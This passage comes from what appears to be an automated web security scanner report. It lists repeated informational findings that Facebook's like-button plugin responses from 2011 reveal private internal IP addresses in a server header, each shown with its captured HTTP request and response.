<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.109. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.224.21
X-Cnection: close
Date: Fri, 06 May 2011 22:41:58 GMT
Content-Length: 7101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.110. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.94.108
X-Cnection: close
Date: Sat, 07 May 2011 02:48:34 GMT
Content-Length: 7131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.111. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.124.37
X-Cnection: close
Date: Fri, 06 May 2011 22:42:17 GMT
Content-Length: 6759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.112. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df17ef48e8c%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff20a4eae48%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Ffacebook.com%2Fexpedia&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=340 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.86.29
X-Cnection: close
Date: Fri, 06 May 2011 22:35:39 GMT
Content-Length: 9937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.113. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.32.129
X-Cnection: close
Date: Sat, 07 May 2011 02:50:28 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.114. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.32.108
X-Cnection: close
Date: Sat, 07 May 2011 02:55:23 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.115. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.106.75
X-Cnection: close
Date: Fri, 06 May 2011 22:42:04 GMT
Content-Length: 7101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.116. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.156.126
X-Cnection: close
Date: Sat, 07 May 2011 02:50:40 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.117. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.148.42
X-Cnection: close
Date: Sat, 07 May 2011 02:38:19 GMT
Content-Length: 7097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.118. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.184.126
X-Cnection: close
Date: Sat, 07 May 2011 02:55:25 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.119. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.198.49
X-Cnection: close
Date: Fri, 06 May 2011 22:41:11 GMT
Content-Length: 7101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.120. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.42.58
X-Cnection: close
Date: Sat, 07 May 2011 02:35:43 GMT
Content-Length: 6878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.121. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.219.102
X-Cnection: close
Date: Sat, 07 May 2011 02:44:28 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.122. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.220.127
X-Cnection: close
Date: Sat, 07 May 2011 02:45:42 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.123. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.233.123
X-Cnection: close
Date: Sat, 07 May 2011 02:50:39 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.124. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/hotels/unpublishedrates/default.asp?mcicid=101278404
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.104.63
X-Cnection: close
Date: Fri, 06 May 2011 22:34:24 GMT
Content-Length: 6814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.125. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.155.106
X-Cnection: close
Date: Sat, 07 May 2011 02:50:43 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.126. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.69.123
X-Cnection: close
Date: Sat, 07 May 2011 02:44:30 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.127. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.188.131
X-Cnection: close
Date: Sat, 07 May 2011 02:50:36 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.128. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
